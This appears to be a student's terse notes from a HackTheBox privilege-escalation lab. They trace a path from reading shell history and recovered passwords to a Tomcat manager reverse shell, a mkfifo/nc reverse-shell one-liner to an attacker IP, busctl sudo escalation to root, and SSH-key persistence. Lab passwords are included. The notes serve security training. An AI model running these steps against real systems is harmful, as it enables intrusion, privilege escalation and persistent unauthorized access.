Assessment

• Notes

  Sudo version 1.8.31
  Ubuntu 20.04.1 LTS (Focal Fossa)
  

• htb-student

  • read history
  • find flag1 in the hidden directories
  • read barry history
  • su barry
    • i_l0ve_s3cur1ty!
• barry
  • flag in ~
  • part of adm group
  • reading /var/log
    • something like cmd/cmd.jsp?cmd=cat+flag3.txt
  • we can find flag3.txt in /var/log itself (DIDNT FIND ORIGINALLY)
  • looking for tomcat
    • /etc/tomcat9
    • /var/lib/tomcat9
  • found tomcatadm password in tomcat-users.xml.bak
    • T0mc@t_s3cret_p@ss!
  • login into the application at 8080
  • upload reverse shell on manager
  • rsh as tomcat + flag4 in folder
• tomcat
  • sudo -l
    • sudo /usr/bin/busctl
    • gtfobin exploit not working
  • opened another nc listener (nc2)
  • ran on nc1 - f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.6 8844 >/tmp/f
  • received shell on nc2
  • made it stable using python3 -c 'import pty;pty.spawn("/bin/bash")'
    • did it 2-3 times
  • ran the gtfobin busctl exploit to get root
  • moved to the root directory to get flag5.txt
  • ssh-keygen in .ssh
  • added id_rsa.pub to authorized keys
  • copied id_rsa to kali using http.server
  • chmod 600 id_rsa
  • ssh -i id_rsa root@ip.ad.dr.rs
• root
  • back to reading /var/log
    • found something like cmd/cmd.jsp?cmd=cat+flag3.txt
  • grep -r "LLPE" .
  • flag3.txt was present in the same folder